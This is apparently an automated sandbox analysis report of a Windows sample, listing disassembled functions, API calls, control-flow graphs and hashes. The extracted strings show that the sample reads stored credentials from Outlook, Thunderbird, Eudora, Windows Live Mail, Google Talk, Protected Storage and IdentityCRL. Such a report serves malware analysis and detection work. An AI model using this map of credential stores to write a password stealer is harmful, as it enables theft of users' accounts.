                                                              • strlen.MSVCRT ref: 00407F64
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: FileFindstrlen$FirstNext
                                                              • String ID: ACD
                                                              • API String ID: 379999529-620537770
                                                              • Opcode ID: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                              • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                                                              • Opcode Fuzzy Hash: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                              • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A
                                                              Function 00401E69 Relevance: 52.8, APIs: 19, Strings: 11, Instructions: 261stringregistryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • memset.MSVCRT ref: 00401E8B
                                                              • strlen.MSVCRT ref: 00401EA4
                                                              • strlen.MSVCRT ref: 00401EB2
                                                              • strlen.MSVCRT ref: 00401EF8
                                                              • strlen.MSVCRT ref: 00401F06
                                                              • memset.MSVCRT ref: 00401FB1
                                                              • atoi.MSVCRT ref: 00401FE0
                                                              • memset.MSVCRT ref: 00402003
                                                              • sprintf.MSVCRT ref: 00402030
                                                                • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                              • memset.MSVCRT ref: 00402086
                                                              • memset.MSVCRT ref: 0040209B
                                                              • strlen.MSVCRT ref: 004020A1
                                                              • strlen.MSVCRT ref: 004020AF
                                                              • strlen.MSVCRT ref: 004020E2
                                                              • strlen.MSVCRT ref: 004020F0
                                                              • memset.MSVCRT ref: 00402018
                                                                • Part of subcall function 004070E3: _mbscpy.MSVCRT ref: 004070EB
                                                                • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                              • _mbscpy.MSVCRT ref: 00402177
                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00402181
                                                              • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 0040219C
                                                                • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                                                              • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                              • API String ID: 1846531875-4223776976
                                                              • Opcode ID: 24cd1edf3e0e6a0f2a794eae778d20d0b8fcf68951756f89e235529ef22c09db
                                                              • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                                                              • Opcode Fuzzy Hash: 24cd1edf3e0e6a0f2a794eae778d20d0b8fcf68951756f89e235529ef22c09db
                                                              • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D
                                                              Function 0040CF44 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 169COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                                                • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                                                • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040D190
                                                              • DeleteObject.GDI32(?), ref: 0040D1A6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                              • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                                                              • API String ID: 745651260-375988210
                                                              • Opcode ID: bd8dfaf8f5238b4af1542c29128bf357c1e928978a50a5a806f3f0ecb947c582
                                                              • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                                                              • Opcode Fuzzy Hash: bd8dfaf8f5238b4af1542c29128bf357c1e928978a50a5a806f3f0ecb947c582
                                                              • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A
                                                              Function 00403C16 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 184libraryloaderCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                              • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                                                              • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                                                              • _mbscpy.MSVCRT ref: 00403E54
                                                              Strings
                                                              • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                                              • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                                              • PStoreCreateInstance, xrefs: 00403C44
                                                              • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                                              • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                                              • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                                              • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                                              • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                                                              • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                                              • pstorec.dll, xrefs: 00403C30
                                                              • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                                              • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: Library$AddressFreeLoadProc_mbscpy
                                                              • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                              • API String ID: 1197458902-317895162
                                                              • Opcode ID: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                                                              • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                                                              • Opcode Fuzzy Hash: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                                                              • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699
                                                              Function 0040FB00 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 101registryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 231 40fb00-40fb35 call 44b090 RegOpenKeyExA 234 40fc37-40fc3d 231->234 235 40fb3b-40fb4f RegOpenKeyExA 231->235 236 40fb55-40fb7e RegQueryValueExA 235->236 237 40fc2d-40fc31 RegCloseKey 235->237 238 40fc23-40fc27 RegCloseKey 236->238 239 40fb84-40fb93 call 404734 236->239 237->234 238->237 239->238 242 40fb99-40fbd1 call 4047a5 239->242 242->238 245 40fbd3-40fbdb 242->245 246 40fc19-40fc1d LocalFree 245->246 247 40fbdd-40fc14 memcpy * 2 call 40f802 245->247 246->238 247->246
                                                              APIs
                                                              • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB31
                                                              • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB4B
                                                              • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC27
                                                                • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                              • memcpy.MSVCRT ref: 0040FBE4
                                                              • memcpy.MSVCRT ref: 0040FBF9
                                                                • Part of subcall function 0040F802: RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,00456E58,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                                                • Part of subcall function 0040F802: memset.MSVCRT ref: 0040F84A
                                                                • Part of subcall function 0040F802: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                • Part of subcall function 0040F802: RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                                              • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
                                                              • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E7F,?), ref: 0040FC31
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                                              • String ID: Dynamic Salt$Software\Microsoft\IdentityCRL$Value$XnE
                                                              • API String ID: 2768085393-2409096184
                                                              • Opcode ID: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                                                              • Instruction ID: dc42a4d3869b5799c80e2b369f36587618a74ee4c7744a3ab9dbe2425e101413
                                                              • Opcode Fuzzy Hash: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                                                              • Instruction Fuzzy Hash: BA316F72508348AFE750DF51DC81E5BBBECFB88358F04093EBA94E2151D735D9188B6A
                                                              Function 00444C4A Relevance: 18.1, APIs: 12, Instructions: 128COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 249 444c4a-444c66 call 444e38 GetModuleHandleA 252 444c87-444c8a 249->252 253 444c68-444c73 249->253 255 444cb3-444d00 __set_app_type __p__fmode __p__commode call 444e34 252->255 253->252 254 444c75-444c7e 253->254 256 444c80-444c85 254->256 257 444c9f-444ca3 254->257 264 444d02-444d0d __setusermatherr 255->264 265 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 255->265 256->252 259 444c8c-444c93 256->259 257->252 260 444ca5-444ca7 257->260 259->252 262 444c95-444c9d 259->262 263 444cad-444cb0 260->263 262->263 263->255 264->265 268 444da4-444da7 265->268 269 444d6a-444d72 265->269 272 444d81-444d85 268->272 273 444da9-444dad 268->273 270 444d74-444d76 269->270 271 444d78-444d7b 269->271 270->269 270->271 271->272 274 444d7d-444d7e 271->274 275 444d87-444d89 272->275 276 444d8b-444d9c GetStartupInfoA 272->276 273->268 274->272 275->274 275->276 277 444d9e-444da2 276->277 278 444daf-444db1 276->278 279 444db2-444dc6 GetModuleHandleA call 40cf44 277->279 278->279 282 444dcf-444e0f _cexit call 444e71 279->282 283 444dc8-444dc9 exit 279->283 283->282
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                              • String ID:
                                                              • API String ID: 3662548030-0
                                                              • Opcode ID: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                                                              • Instruction ID: dd0826a03bb44e9375613df7343647c7563f031d366e42a412bc6d4d3743f318
                                                              • Opcode Fuzzy Hash: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                                                              • Instruction Fuzzy Hash: AF41A0B0C02344DFEB619FA4D8847AD7BB8FB49325F28413BE451A7291D7388982CB5D
                                                              Function 004442EA Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 97stringCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • memset.MSVCRT ref: 0044430B
                                                                • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                                                • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                                                • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                                                • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                                                • Part of subcall function 00410DBB: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                                • Part of subcall function 00410DBB: _mbscpy.MSVCRT ref: 00410E87
                                                              • memset.MSVCRT ref: 00444379
                                                              • memset.MSVCRT ref: 00444394
                                                                • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                              • ExpandEnvironmentStringsA.KERNELBASE(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                                              • strlen.MSVCRT ref: 004443DB
                                                              • _strcmpi.MSVCRT ref: 00444401
                                                              Strings
                                                              • Store Root, xrefs: 004443A5
                                                              • \Microsoft\Windows Mail, xrefs: 00444329
                                                              • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                                              • \Microsoft\Windows Live Mail, xrefs: 00444350
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memset$strlen$Close$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                                              • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                              • API String ID: 832325562-2578778931
                                                              • Opcode ID: 88eecb5596c8840dacdab9e6d9cddf85e53b3344e0b54babe6c18053d28390f2
                                                              • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                                                              • Opcode Fuzzy Hash: 88eecb5596c8840dacdab9e6d9cddf85e53b3344e0b54babe6c18053d28390f2
                                                              • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A
                                                              Function 0040F460 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 180registryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 308 40f460-40f5bd memset * 2 call 4078ba * 2 RegOpenKeyExA 313 40f5c3-40f5ea RegQueryValueExA 308->313 314 40f6d9-40f6df 308->314 315 40f6d0-40f6d3 RegCloseKey 313->315 316 40f5f0-40f5f4 313->316 315->314 316->315 317 40f5fa-40f604 316->317 318 40f606-40f618 call 40466b call 404734 317->318 319 40f677 317->319 329 40f66a-40f675 call 404785 318->329 330 40f61a-40f63e call 4047a5 318->330 321 40f67a-40f67d 319->321 321->315 323 40f67f-40f6bf call 4012ee RegQueryValueExA 321->323 323->315 328 40f6c1-40f6cf 323->328 328->315 329->321 330->329 335 40f640-40f643 330->335 336 40f661-40f664 LocalFree 335->336 337 40f645-40f65a memcpy 335->337 336->329 337->336
                                                              APIs
                                                              • memset.MSVCRT ref: 0040F567
                                                              • memset.MSVCRT ref: 0040F57F
                                                                • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                                              • RegOpenKeyExA.KERNELBASE(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040F5B5
                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                                                • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                              • memcpy.MSVCRT ref: 0040F652
                                                              • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F6D3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
                                                              • String ID:
                                                              • API String ID: 2012582556-3916222277
                                                              • Opcode ID: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                                              • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                                                              • Opcode Fuzzy Hash: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                                              • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA
                                                              Function 004037CA Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 86stringCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 338 4037ca-40381c memset * 2 call 444551 341 4038e2-4038e5 338->341 342 403822-403882 call 4021b6 call 406f06 * 2 strchr 338->342 349 403884-403895 _mbscpy 342->349 350 403897-4038a2 strlen 342->350 351 4038bf-4038dd _mbscpy call 4023e5 349->351 350->351 352 4038a4-4038bc sprintf 350->352 351->341 352->351
                                                              APIs
                                                              • memset.MSVCRT ref: 004037EB
                                                              • memset.MSVCRT ref: 004037FF
                                                                • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                                                                • Part of subcall function 00444551: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                                • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                                                              • strchr.MSVCRT ref: 0040386E
                                                              • _mbscpy.MSVCRT ref: 0040388B
                                                              • strlen.MSVCRT ref: 00403897
                                                              • sprintf.MSVCRT ref: 004038B7
                                                              • _mbscpy.MSVCRT ref: 004038CD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                                                              • String ID: %s@yahoo.com
                                                              • API String ID: 317221925-3288273942
                                                              • Opcode ID: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                                                              • Instruction ID: 76d3f49adc6711096ede71316d8c54080aa8a6e72e6628a7d10ff16d2d587f45
                                                              • Opcode Fuzzy Hash: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                                                              • Instruction Fuzzy Hash: 4B2154B3D001285EEB11EA54DD42FDA77ACDF85308F0404EBB649F7041E678AF888A59
                                                              Function 00404A99 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 354 404a99-404ac2 LoadLibraryA 355 404ac4-404ad2 GetProcAddress 354->355 356 404aec-404af4 354->356 357 404ad4-404ad8 355->357 358 404add-404ae6 FreeLibrary 355->358 362 404af5-404afa 356->362 361 404adb 357->361 358->356 359 404ae8-404aea 358->359 359->362 361->358 363 404b13-404b17 362->363 364 404afc-404b12 MessageBoxA 362->364
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                                              • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                              • FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                                              • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: Library$AddressFreeLoadMessageProc
                                                              • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                              • API String ID: 2780580303-317687271
                                                              • Opcode ID: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                                              • Instruction ID: 488ab604db7d7bb3946a6a0ddadc23e58717ff74c8dc9d9f2a6c2f93e1cc5ebb
                                                              • Opcode Fuzzy Hash: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                                              • Instruction Fuzzy Hash: F401D679B512106BE7115BE59C89F6BBAACDB86759B040135BA02F1180DAB899018A5C
                                                              Function 004034E4 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 365 4034e4-403544 memset * 2 call 410b1e 368 403580-403582 365->368 369 403546-40357f _mbscpy call 406d55 _mbscat call 4033f0 365->369 369->368
                                                              APIs
                                                              • memset.MSVCRT ref: 00403504
                                                              • memset.MSVCRT ref: 0040351A
                                                                • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                              • _mbscpy.MSVCRT ref: 00403555
                                                                • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                              • _mbscat.MSVCRT ref: 0040356D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: _mbscatmemset$Close_mbscpystrlen
                                                              • String ID: InstallPath$Software\Group Mail$fb.dat
                                                              • API String ID: 3071782539-966475738
                                                              • Opcode ID: ba1e5b879fdebbe75c382cc963f8f285cb869b8741e9311d789e5899e64a9370
                                                              • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                                                              • Opcode Fuzzy Hash: ba1e5b879fdebbe75c382cc963f8f285cb869b8741e9311d789e5899e64a9370
                                                              • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9
                                                              Function 0040CCD7 Relevance: 9.1, APIs: 6, Instructions: 71windowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 374 40ccd7-40cd06 ??2@YAPAXI@Z 375 40cd08-40cd0d 374->375 376 40cd0f 374->376 377 40cd11-40cd24 ??2@YAPAXI@Z 375->377 376->377 378 40cd26-40cd2d call 404025 377->378 379 40cd2f 377->379 381 40cd31-40cd57 378->381 379->381 383 40cd66-40cdd9 call 407088 call 4019b5 memset LoadIconA call 4019b5 _mbscpy 381->383 384 40cd59-40cd60 DeleteObject 381->384 384->383
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                              • String ID:
                                                              • API String ID: 2054149589-0
                                                              • Opcode ID: ac2346bdc6bf8c69db932d73876581c2cd712649df4ebdee0f030b2719307f74
                                                              • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                                                              • Opcode Fuzzy Hash: ac2346bdc6bf8c69db932d73876581c2cd712649df4ebdee0f030b2719307f74
                                                              • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8
                                                              Function 004085D2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79registryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                                                • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                                                • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                                                • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                                                • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                                                • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                                                • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                              • memset.MSVCRT ref: 00408620
                                                                • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                              • memset.MSVCRT ref: 00408671
                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 004086AF
                                                              • RegCloseKey.ADVAPI32(?), ref: 004086D6
                                                              Strings
                                                              • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUser
                                                              • String ID: Software\Google\Google Talk\Accounts
                                                              • API String ID: 1366857005-1079885057
                                                              • Opcode ID: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                                                              • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                                                              • Opcode Fuzzy Hash: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                                                              • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB
                                                              Function 0040BA28 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
